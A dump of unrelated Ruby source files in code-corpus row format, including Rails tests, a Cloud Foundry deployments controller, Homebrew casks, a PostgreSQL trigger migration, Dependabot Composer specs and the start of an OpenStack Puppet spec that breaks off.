| 26.166667 | 86 | 0.694268 |
b973bd8f1568732f2095c028df0f53ed27c62ba7 | 835 | require 'reading_time/version'
require 'reading_time/core_ext'
require 'reading_time/time'
require 'sanitize'
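# Estimates how long a piece of (possibly HTML) text takes to read.
# Illustrative usage -- the input text and rate below are made up:
#
#   ReadingTime.word_count("<p>Hello brave new world</p>") #=> 4
#   ReadingTime.parse(text, words_per_min: 180) #=> a ReadingTime::Time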
module ReadingTime
AVG_WORDS_PER_MIN = 200
ACCURACY_IN_SECONDS = 5
def self.word_count(text)
words(text).count
end
def self.parse(text, opts = {})
avg_words_per_min = opts[:words_per_min] || AVG_WORDS_PER_MIN
if opts[:format] and not opts[:format].is_a? String
raise '"format" is not a String'
end
minutes = self.word_count(text).to_f / avg_words_per_min
Time.new(minutes)
end
private
def self.plain_text(text)
# Remove all the HTML
Sanitize.clean(text)
end
  def self.trim(minutes, opts = {})
    # TODO: trim the estimate to the requested accuracy
    accuracy = opts[:accuracy] || ACCURACY_IN_SECONDS
  end
def self.words(text)
self.plain_text(text).split
end
end
| 18.977273 | 65 | 0.682635 |
26243ff35bc75147ceda1eb8e6b59da74680c490 | 1,417 | require 'test_helper'
class FollowingTest < ActionDispatch::IntegrationTest
def setup
@user = users(:samrood)
log_in_as(@user)
@other = users(:micheal)
end
test 'following page' do
get following_user_path(@user)
assert_not @user.following.empty?
assert_match @user.following.count.to_s, response.body
@user.following.each do |user|
assert_select 'a[href=?]', user_path(user)
end
end
test 'followers page' do
get followers_user_path(@user)
assert_not @user.followers.empty?
assert_match @user.followers.count.to_s, response.body
@user.followers.each do |user|
assert_select 'a[href=?]', user_path(user)
end
end
test 'should follow a user the standard way' do
assert_difference '@user.following.count', 1 do
post relationships_path, params: { followed_id: @other.id }
end
end
test 'should follow a user with Ajax' do
assert_difference '@user.following.count', 1 do
post relationships_path, params: { followed_id: @other.id }, xhr: true
end
end
test 'should unfollow a user the standard way' do
assert_difference '@user.following.count', -1 do
delete relationship_path(relationships(:one))
end
end
test 'should unfollow a user with Ajax' do
assert_difference '@user.following.count', -1 do
delete relationship_path(relationships(:one)), xhr: true
end
end
end
| 26.240741 | 76 | 0.693719 |
1dabaabc72b5102309e92608157def4def303a96 | 3,760 | require 'messages/deployments_list_message'
require 'messages/deployment_create_message'
require 'messages/deployment_update_message'
require 'fetchers/deployment_list_fetcher'
require 'presenters/v3/deployment_presenter'
require 'actions/deployment_create'
require 'actions/deployment_update'
require 'actions/deployment_cancel'
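# V3 API endpoints for app deployments: list, show, create, update and cancel.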
class DeploymentsController < ApplicationController
def index
message = DeploymentsListMessage.from_params(query_params)
invalid_param!(message.errors.full_messages) unless message.valid?
deployment_list_fetcher = DeploymentListFetcher.new(message: message)
dataset = if permission_queryer.can_read_globally?
deployment_list_fetcher.fetch_all
else
deployment_list_fetcher.fetch_for_spaces(space_guids: permission_queryer.readable_space_guids)
end
render status: :ok, json: Presenters::V3::PaginatedListPresenter.new(
presenter: Presenters::V3::DeploymentPresenter,
paginated_result: SequelPaginator.new.get_page(dataset, message.try(:pagination_options)),
path: '/v3/deployments',
message: message
)
end
def create
deployments_not_enabled! if Config.config.get(:temporary_disable_deployments)
message = DeploymentCreateMessage.new(hashed_params[:body])
unprocessable!(message.errors.full_messages) unless message.valid?
app = AppModel.find(guid: message.app_guid)
unprocessable!('Unable to use app. Ensure that the app exists and you have access to it.') unless app && permission_queryer.can_write_to_space?(app.space.guid)
unprocessable!('Cannot create deployment from a revision for an app without revisions enabled') if message.revision_guid && !app.revisions_enabled
begin
deployment = DeploymentCreate.create(app: app, user_audit_info: user_audit_info, message: message)
logger.info("Created deployment #{deployment.guid} for app #{app.guid}")
rescue DeploymentCreate::Error => e
unprocessable!(e.message)
end
render status: :created, json: Presenters::V3::DeploymentPresenter.new(deployment)
end
def update
deployment = DeploymentModel.find(guid: hashed_params[:guid])
resource_not_found!(:deployment) unless deployment &&
permission_queryer.can_read_from_space?(deployment.app.space.guid, deployment.app.space.organization.guid)
unauthorized! unless permission_queryer.can_write_to_space?(deployment.app.space.guid)
message = VCAP::CloudController::DeploymentUpdateMessage.new(hashed_params[:body])
unprocessable!(message.errors.full_messages) unless message.valid?
deployment = VCAP::CloudController::DeploymentUpdate.update(deployment, message)
render status: :ok, json: Presenters::V3::DeploymentPresenter.new(deployment)
end
def show
deployment = DeploymentModel.find(guid: hashed_params[:guid])
resource_not_found!(:deployment) unless deployment &&
permission_queryer.can_read_from_space?(deployment.app.space.guid, deployment.app.space.organization.guid)
render status: :ok, json: Presenters::V3::DeploymentPresenter.new(deployment)
end
def cancel
deployment = DeploymentModel.find(guid: hashed_params[:guid])
resource_not_found!(:deployment) unless deployment && permission_queryer.can_write_to_space?(deployment.app.space_guid)
begin
DeploymentCancel.cancel(deployment: deployment, user_audit_info: user_audit_info)
logger.info("Canceled deployment #{deployment.guid} for app #{deployment.app_guid}")
rescue DeploymentCancel::Error => e
unprocessable!(e.message)
end
head :ok
end
private
def deployments_not_enabled!
raise CloudController::Errors::ApiError.new_from_details('DeploymentsDisabled')
end
end
| 40.430108 | 163 | 0.767021 |
6213f9ba434761fb0f2ee4058f3cc310e7385eac | 1,032 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe Shared::Utils::Normalizer do
subject(:normalizer) { described_class.new }
describe '#normalize_url' do
it 'converts nil-value to empty string' do
expect(normalizer.normalize_url(nil)).to eq('')
end
it 'removes spaces from the url' do
expect(normalizer.normalize_url(' https://example.com/123 ')).to eq('https://example.com/123')
end
end
describe '#remove_extra_whitespaces' do
it 'converts nil-value to empty string' do
expect(normalizer.remove_extra_whitespaces(nil)).to eq('')
end
it 'removes newlines' do
expect(normalizer.remove_extra_whitespaces("My\nNew\nPost")).to eq('MyNewPost')
end
it 'replaces extra spaces with one space' do
expect(normalizer.remove_extra_whitespaces('My New Post')).to eq('My New Post')
end
it 'removes leading and ending spaces' do
expect(normalizer.remove_extra_whitespaces(' My New Post ')).to eq('My New Post')
end
end
end
| 28.666667 | 100 | 0.696705 |
5d6b1a5320b2072fd11dd7b30e46bdc2bd625e2f | 1,224 | # frozen_string_literal: true
require 'erb'
require_relative 'template'
# All things required to generate the ModelPages
class ModelPages
def initialize(works)
@works = works
end
def generate(template)
models.each_with_object({}) do |model, collection|
template_values = {
title: model,
thumbnails: thumbnails(model),
navigation: navigation(model)
}
filename = Template.sanitize_link(model) + '.html'
      collection[filename] = Template.generate(template, template_values)
end
end
def models
@works.map { |work| work.css('model').text }.uniq.reject(&:empty?)
end
def thumbnails(model)
@works.select { |work| work.css('model').text == model }.map do |work|
{
src: work.css('urls url[type="small"]').text,
alt: work.css('filename').text
}
end
end
def navigation(model)
home_link = [{ href: 'index.html', text: 'Home' }]
make_links = @works.select { |work| work.css('model').text == model }.map do |work|
{
href: Template.sanitize_link(work.css('make').text) + '.html',
text: work.css('make').text
}
end
home_link + make_links.uniq
end
end
| 23.09434 | 87 | 0.623366 |
7944c5e0a016cc69b73206a0c1456a4a2691985c | 1067 | # Configuration values stored in the database.
# This also stores the HTML of pages such as the homepage and the wiki.
# Usage:
# SiteConfig.foo
# SiteConfig.foo = "asdkglaksdg"
class SiteConfig
include Mongoid::Document
field :key
field :value
index key: 1
validates :key, presence: true, uniqueness: true
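  # `method_missing` implements the dynamic accessors shown in the header
  # comment: reading SiteConfig.foo fetches (and caches) the value stored
  # under key "foo", while SiteConfig.foo = "bar" creates or updates it.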
def self.method_missing(method, *args)
method_name = method.to_s
super(method, *args)
rescue NoMethodError
if method_name =~ /=$/
var_name = method_name.delete('=')
value = args.first.to_s
# save
if (item = find_by_key(var_name))
item.update_attribute(:value, value)
else
SiteConfig.create(key: var_name, value: value)
end
else
Rails.cache.fetch("site_config:#{method}") do
if (item = find_by_key(method))
item.value
end
end
end
end
after_save :update_cache
def update_cache
Rails.cache.write("site_config:#{key}", value)
end
def self.find_by_key(key)
where(key: key.to_s).first
end
def self.save_default(key, value)
create(key: key, value: value.to_s) unless find_by_key(key)
end
end
| 20.921569 | 63 | 0.651359 |
ff2a813973451ae17994a6d4b48e84a2971c0c8a | 908 | cask 'gitkraken' do
version '0.8.3'
sha256 'af48b91889f6473ad2a8b5a17ee9badf69526a145c91d3da7640bfa257ecc6aa'
url "http://release.gitkraken.com/darwin/v#{version}.zip"
appcast 'https://release.gitkraken.com/darwin/RELEASES',
checkpoint: '0ab458302fdfe2cdc8f005a0eb3e196c365427376ba75022f66ce9b229505d97'
name 'GitKraken'
homepage 'http://www.gitkraken.com/'
license :gratis
auto_updates true
app 'GitKraken.app'
zap delete: [
'~/Library/Application Support/com.axosoft.gitkraken.ShipIt',
'~/Library/Application Support/GitKraken',
'~/Library/Caches/GitKraken',
'~/Library/Caches/com.axosoft.gitkraken',
'~/Library/Preferences/com.axosoft.gitkraken.plist',
'~/Library/Saved Application State/com.axosoft.gitkraken.savedState',
'~/.gitkraken',
]
end
| 34.923077 | 88 | 0.659692 |
337764fc61e346d356e7309835cf39c23e3af826 | 2,287 | class GenTrackerHistoryDeleteTrigger < ActiveRecord::Migration
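  # Installs a PostgreSQL trigger that keeps the trackers table consistent
  # whenever rows are deleted from tracker_history (details in the SQL below).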
def change
reversible do |dir|
dir.up do
execute <<EOF
DROP TRIGGER IF EXISTS tracker_record_delete ON tracker_history;
DROP FUNCTION IF EXISTS handle_delete();
CREATE FUNCTION handle_delete() RETURNS trigger
LANGUAGE plpgsql
AS $$
DECLARE
latest_tracker tracker_history%ROWTYPE;
BEGIN
-- Find the most recent remaining item in tracker_history for the master/protocol pair,
-- now that the target record has been deleted.
-- tracker_id is the foreign key onto the trackers table master/protocol record.
SELECT * INTO latest_tracker
FROM tracker_history
WHERE tracker_id = OLD.tracker_id
ORDER BY event_date DESC NULLS last, updated_at DESC NULLS last LIMIT 1;
IF NOT FOUND THEN
-- No record was found in tracker_history for the master/protocol pair.
-- Therefore there should be no corresponding trackers record either. Delete it.
DELETE FROM trackers WHERE trackers.id = OLD.tracker_id;
ELSE
-- A record was found in tracker_history. Since it is the latest one for the master/protocol pair,
-- just go ahead and update the corresponding record in trackers.
UPDATE trackers
SET
event_date = latest_tracker.event_date,
sub_process_id = latest_tracker.sub_process_id,
protocol_event_id = latest_tracker.protocol_event_id,
item_id = latest_tracker.item_id,
item_type = latest_tracker.item_type,
updated_at = latest_tracker.updated_at,
notes = latest_tracker.notes,
user_id = latest_tracker.user_id
WHERE trackers.id = OLD.tracker_id;
END IF;
RETURN OLD;
END
$$;
-- For every row that is deleted, call the function
CREATE TRIGGER tracker_record_delete AFTER DELETE ON tracker_history FOR EACH ROW EXECUTE PROCEDURE handle_delete();
EOF
end
dir.down do
execute <<EOF
DROP TRIGGER IF EXISTS tracker_record_delete ON tracker_history;
DROP FUNCTION IF EXISTS handle_delete();
EOF
end
end
end
end
| 30.092105 | 118 | 0.661128 |
ac3164a4ff11cffac6f9bc4c708df7a3a01a5e61 | 212 | class TestRoutingController < ApplicationController
def routed_action
render_class_and_action
end
def test_named_routes_from_plugin
render :text => plugin_route_path(:action => "index")
end
end | 23.555556 | 57 | 0.778302 |
61cc5724ad96727e398c2c3f5c842eee0fa1a4dd | 24,322 | # frozen_string_literal: true
require "spec_helper"
require "dependabot/dependency"
require "dependabot/dependency_file"
require "dependabot/composer/file_updater/lockfile_updater"
RSpec.describe Dependabot::Composer::FileUpdater::LockfileUpdater do
let(:updater) do
described_class.new(
dependency_files: files,
dependencies: [dependency],
credentials: credentials
)
end
let(:credentials) do
[{
"type" => "git_source",
"host" => "github.com",
"username" => "x-access-token",
"password" => "token"
}]
end
let(:files) { [composer_json, lockfile] }
let(:composer_json) do
Dependabot::DependencyFile.new(
name: "composer.json",
content: fixture("composer_files", manifest_fixture_name)
)
end
let(:lockfile) do
Dependabot::DependencyFile.new(
name: "composer.lock",
content: fixture("lockfiles", lockfile_fixture_name)
)
end
let(:manifest_fixture_name) { "exact_version" }
let(:lockfile_fixture_name) { "exact_version" }
let(:dependency) do
Dependabot::Dependency.new(
name: "monolog/monolog",
version: "1.22.1",
requirements: requirements,
previous_version: "1.0.1",
previous_requirements: previous_requirements,
package_manager: "composer"
)
end
let(:requirements) do
[{
file: "composer.json",
requirement: "1.22.1",
groups: [],
source: nil
}]
end
let(:previous_requirements) do
[{
file: "composer.json",
requirement: "1.0.1",
groups: [],
source: nil
}]
end
let(:tmp_path) { Dependabot::SharedHelpers::BUMP_TMP_DIR_PATH }
before { Dir.mkdir(tmp_path) unless Dir.exist?(tmp_path) }
describe "the updated lockfile" do
subject(:updated_lockfile_content) do
raw = updater.updated_lockfile_content
JSON.parse(raw).to_json
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"1.22.1\"")
end
it { is_expected.to include "\"prefer-stable\":false" }
context "when an old version of PHP is specified" do
context "as a platform requirement" do
let(:manifest_fixture_name) { "old_php_platform" }
let(:dependency) do
Dependabot::Dependency.new(
name: "illuminate/support",
version: "5.4.36",
requirements: [{
file: "composer.json",
requirement: "^5.2.0",
groups: ["runtime"],
source: nil
}],
previous_version: "5.2.7",
previous_requirements: [{
file: "composer.json",
requirement: "^5.2.0",
groups: ["runtime"],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"v5.4.36\"")
end
end
context "with an application using a >= PHP constraint" do
let(:manifest_fixture_name) { "php_specified" }
let(:dependency) do
Dependabot::Dependency.new(
name: "phpdocumentor/reflection-docblock",
version: "4.3.1",
requirements: [{
file: "composer.json",
requirement: "4.3.1",
groups: ["runtime"],
source: nil
}],
previous_version: "2.0.4",
previous_requirements: [{
file: "composer.json",
requirement: "2.0.4",
groups: ["runtime"],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"4.3.1\"")
end
end
context "with an application using a ^ PHP constraint" do
let(:manifest_fixture_name) { "php_specified_min_invalid" }
let(:dependency) do
Dependabot::Dependency.new(
name: "phpdocumentor/reflection-docblock",
version: "3.3.2",
requirements: [{
file: "composer.json",
requirement: "3.3.2",
groups: ["runtime"],
source: nil
}],
previous_version: "2.0.4",
previous_requirements: [{
file: "composer.json",
requirement: "2.0.4",
groups: ["runtime"],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"3.3.2\"")
end
end
context "and an extension is specified that we don't have" do
let(:manifest_fixture_name) { "missing_extension" }
let(:lockfile_fixture_name) { "missing_extension" }
let(:dependency) do
Dependabot::Dependency.new(
name: "illuminate/support",
version: "5.4.36",
requirements: [{
file: "composer.json",
requirement: "^5.2.0",
groups: ["runtime"],
source: nil
}],
previous_version: "5.2.7",
previous_requirements: [{
file: "composer.json",
requirement: "^5.2.0",
groups: ["runtime"],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"v5.4.36\"")
expect(updated_lockfile_content).
to include("\"platform-overrides\":{\"php\":\"5.6.4\"}")
end
end
end
context "with a plugin that would cause errors" do
let(:manifest_fixture_name) { "plugin" }
let(:lockfile_fixture_name) { "plugin" }
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"1.22.1\"")
end
end
context "with a plugin that conflicts with the current composer version" do
let(:manifest_fixture_name) { "outdated_flex" }
let(:lockfile_fixture_name) { "outdated_flex" }
let(:dependency) do
Dependabot::Dependency.new(
name: "symphony/lock",
version: "4.1.3",
requirements: [{
file: "composer.json",
requirement: "^4.1",
groups: ["runtime"],
source: nil
}],
previous_version: "4.1.1",
previous_requirements: [{
file: "composer.json",
requirement: "^4.1",
groups: ["runtime"],
source: nil
}],
package_manager: "composer"
)
end
it "raises a helpful error" do
expect { updated_lockfile_content }.to raise_error do |error|
expect(error.message).to start_with("One of your Composer plugins")
expect(error).to be_a Dependabot::DependencyFileNotResolvable
end
end
end
context "that requires an environment variable" do
let(:manifest_fixture_name) { "env_variable" }
context "that hasn't been provided" do
it "raises a MissingEnvironmentVariable error" do
expect { updated_lockfile_content }.to raise_error do |error|
expect(error).to be_a(Dependabot::MissingEnvironmentVariable)
expect(error.environment_variable).to eq("ACF_PRO_KEY")
end
end
end
context "that has been provided" do
let(:updater) do
described_class.new(
dependency_files: files,
dependencies: [dependency],
credentials: [{
"type" => "git_source",
"host" => "github.com",
"username" => "x-access-token",
"password" => "token"
}, {
"type" => "php_environment_variable",
"env-key" => "ACF_PRO_KEY",
"env-value" => "example_key"
}]
)
end
it "runs just fine (we get a 404 here because our key is wrong)" do
expect { updated_lockfile_content }.to raise_error do |error|
expect(error).to be_a(Dependabot::DependencyFileNotResolvable)
expect(error.message).to include("404 Not Found")
end
end
end
end
context "with a path source" do
let(:files) { [composer_json, lockfile, path_dep] }
let(:manifest_fixture_name) { "path_source" }
let(:lockfile_fixture_name) { "path_source" }
let(:path_dep) do
Dependabot::DependencyFile.new(
name: "components/path_dep/composer.json",
content: fixture("composer_files", "path_dep")
)
end
let(:dependency) do
Dependabot::Dependency.new(
name: "monolog/monolog",
version: "1.22.1",
requirements: [{
file: "composer.json",
requirement: "1.22.*",
groups: [],
source: nil
}],
previous_version: "1.0.1",
previous_requirements: [{
file: "composer.json",
requirement: "1.0.*",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"1.22.1\"")
end
end
context "when the new version is covered by the old requirements" do
let(:manifest_fixture_name) { "minor_version" }
let(:lockfile_fixture_name) { "covered_version" }
let(:dependency) do
Dependabot::Dependency.new(
name: "monolog/monolog",
version: "1.0.2",
requirements: [{
file: "composer.json",
requirement: "1.0.*",
groups: [],
source: nil
}],
previous_version: "1.0.0",
previous_requirements: [{
file: "composer.json",
requirement: "1.0.*",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
updated_dep = JSON.parse(updated_lockfile_content).
fetch("packages").
find { |p| p["name"] == "monolog/monolog" }
expect(updated_dep.fetch("version")).to eq("1.0.2")
end
end
context "when the dependency is a development dependency" do
let(:manifest_fixture_name) { "development_dependencies" }
let(:lockfile_fixture_name) { "development_dependencies" }
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"1.22.1\"")
end
end
context "when the dependency is a subdependency" do
let(:manifest_fixture_name) { "subdependency_update_required" }
let(:lockfile_fixture_name) { "subdependency_update_required" }
let(:dependency) do
Dependabot::Dependency.new(
name: "illuminate/contracts",
version: "5.2.45",
previous_version: "5.2.37",
requirements: [],
previous_requirements: [],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"v5.2.45\"")
expect(updated_lockfile_content).
to include("22bde7b048a33c702d9737fc1446234fff9b1363")
end
context "and is limited by a library's PHP version" do
let(:manifest_fixture_name) { "php_specified_in_library" }
let(:lockfile_fixture_name) { "php_specified_in_library" }
let(:dependency) do
Dependabot::Dependency.new(
name: "doctrine/inflector",
version: "1.1.0",
previous_version: "1.0",
requirements: [],
previous_requirements: [],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"v1.1.0\"")
expect(updated_lockfile_content).
to include("90b2128806bfde671b6952ab8bea493942c1fdae")
end
end
end
context "with a private registry" do
let(:manifest_fixture_name) { "private_registry" }
let(:lockfile_fixture_name) { "private_registry" }
before { `composer clear-cache --quiet` }
let(:dependency) do
Dependabot::Dependency.new(
name: "dependabot/dummy-pkg-a",
version: "2.2.0",
previous_version: "2.1.0",
requirements: [{
file: "composer.json",
requirement: "*",
groups: [],
source: nil
}],
previous_requirements: [{
file: "composer.json",
requirement: "*",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
context "with good credentials" do
let(:credentials) do
[{
"type" => "git_source",
"host" => "github.com",
"username" => "x-access-token",
"password" => "token"
}, {
"type" => "composer_repository",
"registry" => "php.fury.io",
"username" => "yFu9PBmw1HxNjFB818TW", # Throwaway account
"password" => ""
}]
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"2.2.0\"")
end
end
end
context "with a laravel nova" do
let(:manifest_fixture_name) { "laravel_nova" }
let(:lockfile_fixture_name) { "laravel_nova" }
before { `composer clear-cache --quiet` }
let(:dependency) do
Dependabot::Dependency.new(
name: "laravel/nova",
version: "2.0.9",
previous_version: "2.0.7",
requirements: [{
file: "composer.json",
requirement: "*",
groups: [],
source: nil
}],
previous_requirements: [{
file: "composer.json",
requirement: "*",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
context "with bad credentials" do
let(:credentials) do
[{
"type" => "git_source",
"host" => "github.com",
"username" => "x-access-token",
"password" => "token"
}, {
"type" => "composer_repository",
"registry" => "nova.laravel.com",
"username" => "username",
"password" => "password"
}]
end
it "raises a helpful errors" do
expect { updated_lockfile_content }.to raise_error do |error|
expect(error).to be_a Dependabot::PrivateSourceAuthenticationFailure
expect(error.source).to eq("nova.laravel.com")
end
end
end
end
context "when another dependency has git source with a bad reference" do
let(:lockfile_fixture_name) { "git_source_bad_ref" }
let(:manifest_fixture_name) { "git_source_bad_ref" }
let(:dependency) do
Dependabot::Dependency.new(
name: "symfony/polyfill-mbstring",
version: "1.6.0",
requirements: [{
file: "composer.json",
requirement: "1.6.0",
groups: [],
source: nil
}],
previous_version: "1.0.1",
previous_requirements: [{
file: "composer.json",
requirement: "1.0.1",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "raises a helpful errors" do
expect { updated_lockfile_content }.to raise_error do |error|
expect(error).to be_a Dependabot::GitDependencyReferenceNotFound
expect(error.dependency).to eq("monolog/monolog")
end
end
end
context "when another dependency has git source with a bad commit" do
let(:manifest_fixture_name) { "git_source" }
let(:lockfile_fixture_name) { "git_source_bad_commit" }
let(:dependency) do
Dependabot::Dependency.new(
name: "symfony/polyfill-mbstring",
version: "1.6.0",
requirements: [{
file: "composer.json",
requirement: "1.6.0",
groups: [],
source: nil
}],
previous_version: "1.0.1",
previous_requirements: [{
file: "composer.json",
requirement: "1.0.1",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "updates the lockfile correctly" do
# Updates the commit SHA of the git dependency (because we have to)
expect(updated_lockfile_content).
to include('"303b8a83c87d5c6d749926cf02620465a5dcd0f2"')
expect(updated_lockfile_content).to include('"version":"dev-example"')
# Updates the specified dependency
expect(updated_lockfile_content).
to include('"2ec8b39c38cb16674bbf3fea2b6ce5bf117e1296"')
expect(updated_lockfile_content).to include('"version":"v1.6.0"')
end
end
context "with a git source using no-api" do
let(:manifest_fixture_name) { "git_source_no_api" }
let(:lockfile_fixture_name) { "git_source_no_api" }
let(:dependency) do
Dependabot::Dependency.new(
name: "symfony/polyfill-mbstring",
version: "1.6.0",
requirements: [{
file: "composer.json",
requirement: "1.6.0",
groups: [],
source: nil
}],
previous_version: "1.0.1",
previous_requirements: [{
file: "composer.json",
requirement: "1.0.1",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "updates the lockfile correctly" do
# Doesn't update the commit SHA of the git dependency
expect(updated_lockfile_content).
to include('"5267b03b1e4861c4657ede17a88f13ef479db482"')
expect(updated_lockfile_content).
to_not include('"303b8a83c87d5c6d749926cf02620465a5dcd0f2"')
expect(updated_lockfile_content).to include('"version":"dev-example"')
# Does update the specified dependency
expect(updated_lockfile_content).
to include('"2ec8b39c38cb16674bbf3fea2b6ce5bf117e1296"')
expect(updated_lockfile_content).to include('"version":"v1.6.0"')
# Cleans up the additions we made
expect(updated_lockfile_content).to_not include('"support": {')
end
end
context "when another dependency has an unreachable git source" do
let(:lockfile_fixture_name) { "git_source_unreachable" }
let(:manifest_fixture_name) { "git_source_unreachable" }
let(:dependency) do
Dependabot::Dependency.new(
name: "symfony/polyfill-mbstring",
version: "1.6.0",
requirements: [{
file: "composer.json",
requirement: "1.6.0",
groups: [],
source: nil
}],
previous_version: "1.0.1",
previous_requirements: [{
file: "composer.json",
requirement: "1.0.1",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "raises a helpful errors" do
expect { updated_lockfile_content }.to raise_error do |error|
expect(error).to be_a Dependabot::GitDependenciesNotReachable
expect(error.dependency_urls).
to eq(["https://github.com/no-exist-sorry/monolog"])
end
end
end
context "when there are patches" do
let(:manifest_fixture_name) { "patches" }
let(:lockfile_fixture_name) { "patches" }
let(:dependency) do
Dependabot::Dependency.new(
name: "ehime/hello-world",
version: "1.0.5",
requirements: [{
file: "composer.json",
requirement: "1.0.5",
groups: [],
source: nil
}],
previous_version: "1.0.4",
previous_requirements: [{
file: "composer.json",
requirement: "1.0.4",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "doesn't strip the patches" do
updated_dep = JSON.parse(updated_lockfile_content).
fetch("packages").
find { |p| p["name"] == "ehime/hello-world" }
expect(updated_dep.dig("extra", "patches_applied")).
to include("[PATCH] markdown modified")
end
end
context "regression spec for media-organizer" do
let(:manifest_fixture_name) { "media_organizer" }
let(:lockfile_fixture_name) { "media_organizer" }
let(:dependency) do
Dependabot::Dependency.new(
name: "monolog/monolog",
version: "1.23.0",
requirements: [{
file: "composer.json",
requirement: "~1.0",
groups: [],
source: nil
}],
previous_version: "1.20.0",
previous_requirements: [{
file: "composer.json",
requirement: "~1.0",
groups: [],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
updated_dep = JSON.parse(updated_lockfile_content).
fetch("packages-dev").
find { |p| p["name"] == "monolog/monolog" }
expect(Gem::Version.new(updated_dep.fetch("version"))).
to be >= Gem::Version.new("1.23.0")
end
end
context "when a subdependency needs to be updated" do
let(:manifest_fixture_name) { "subdependency_update_required" }
let(:lockfile_fixture_name) { "subdependency_update_required" }
let(:dependency) do
Dependabot::Dependency.new(
name: "illuminate/support",
version: "5.6.23",
requirements: [{
file: "composer.json",
requirement: "^5.6.23",
groups: ["runtime"],
source: nil
}],
previous_version: "5.2.0",
previous_requirements: [{
file: "composer.json",
requirement: "^5.2.0",
groups: ["runtime"],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"v5.6.23\"")
expect(updated_lockfile_content).to include("ba383d0a3bf6aa0b7a1307fdc")
end
end
context "updating to a specific version when reqs would allow higher" do
let(:manifest_fixture_name) { "subdependency_update_required" }
let(:lockfile_fixture_name) { "subdependency_update_required" }
let(:dependency) do
Dependabot::Dependency.new(
name: "illuminate/support",
version: "5.3.0",
requirements: [{
file: "composer.json",
requirement: "^5.2.0",
groups: ["runtime"],
source: nil
}],
previous_version: "5.2.0",
previous_requirements: [{
file: "composer.json",
requirement: "^5.2.0",
groups: ["runtime"],
source: nil
}],
package_manager: "composer"
)
end
it "has details of the updated item" do
expect(updated_lockfile_content).to include("\"version\":\"v5.3.0\"")
expect(updated_lockfile_content).to include("e244eda135819216ac3044146")
end
end
end
end
| 31.022959 | 80 | 0.546994 |
1c7630094e50525fee31f53460136211b2b3174e | 518 | cask 'zeplin' do
version '2.5,717'
sha256 '39c4d60e605a4a5ae72d72ccc308bfefec4333e780b4e8d16c25d3d9f03422ed'
url 'https://api.zeplin.io/urls/download-mac'
appcast 'https://rink.hockeyapp.net/api/2/apps/8926efffe734b6d303d09f41d90c34fc'
name 'Zeplin'
homepage 'https://zeplin.io/'
auto_updates true
app 'Zeplin.app'
zap trash: [
'~/Library/Logs/Zeplin',
'~/Library/Caches/io.zeplin.osx',
'~/Library/Preferences/io.zeplin.osx.plist',
]
end
| 25.9 | 82 | 0.658301 |
e8409c787f0851417b338e046ebabed835a67ed9 | 441 | #! /usr/bin/ruby
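# Regenerates the RDoc API documentation: rewrites the @param/@-tag doc
# comments in tkrzw-doc.rb into RDoc markup, saves the result as a temporary
# tkrzw.rb, runs rdoc on it into api-doc, and removes the temporary file.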
system("rm -rf api-doc")
File::open("tkrzw-doc.rb") { |ifile|
File::open("tkrzw.rb", "w") { |ofile|
ifile.each { |line|
line = line.chomp
line = line.sub(/# +@param +(\w+) +/, '# - <b>@param <i>\\1</i></b> ')
line = line.sub(/# +@(\w+) +/, '# - <b>@\\1</b> ')
ofile.printf("%s\n", line)
}
}
}
system('rdoc --title "Tkrzw" --main tkrzw.rb -o api-doc tkrzw.rb')
system("rm -f tkrzw.rb")
| 24.5 | 76 | 0.489796 |
914807b01c7a09a42c09ef1f4c56aecf2bb282cd | 186 | # frozen_string_literal: true
class AddRightsToUser < ActiveRecord::Migration[6.0]
def change
add_column :users, :rights, :string, array: true, null: false, default: []
end
end
| 23.25 | 78 | 0.725806 |
3890546875fe215b737944bce9426ff71b7e5507 | 19,881 | require 'spec_helper'
describe 'openstack::all' do
# minimum set of default parameters
let :params do
{
:public_address => '10.0.0.1',
:public_interface => 'eth0',
:admin_email => 'some_user@some_fake_email_address.foo',
:admin_password => 'ChangeMe',
:rabbit_password => 'rabbit_pw',
:keystone_db_password => 'keystone_pass',
:keystone_admin_token => 'keystone_admin_token',
:glance_db_password => 'glance_pass',
:glance_user_password => 'glance_pass',
:nova_db_password => 'nova_pass',
:nova_user_password => 'nova_pass',
:secret_key => 'secret_key',
:mysql_root_password => 'sql_pass',
}
end
let :facts do
{
:operatingsystem => 'Ubuntu',
:osfamily => 'Debian',
:operatingsystemrelease => '12.04',
:puppetversion => '2.7.x',
:memorysize => '2GB',
:processorcount => '2',
:concat_basedir => '/var/lib/puppet/concat'
}
end
context 'neutron enabled (which is the default)' do
before do
params.merge!(:cinder => false)
end
it 'raises an error if no neutron_user_password is set' do
expect { subject }.to raise_error(Puppet::Error, /neutron_user_password must be specified when neutron is configured/)
end
context 'with neutron_user_password set' do
before do
params.merge!(:neutron_user_password => 'neutron_user_password')
end
it 'raises an error if no neutron_db_password is set' do
expect { subject }.to raise_error(Puppet::Error, /neutron_db_password must be set when configuring neutron/)
end
end
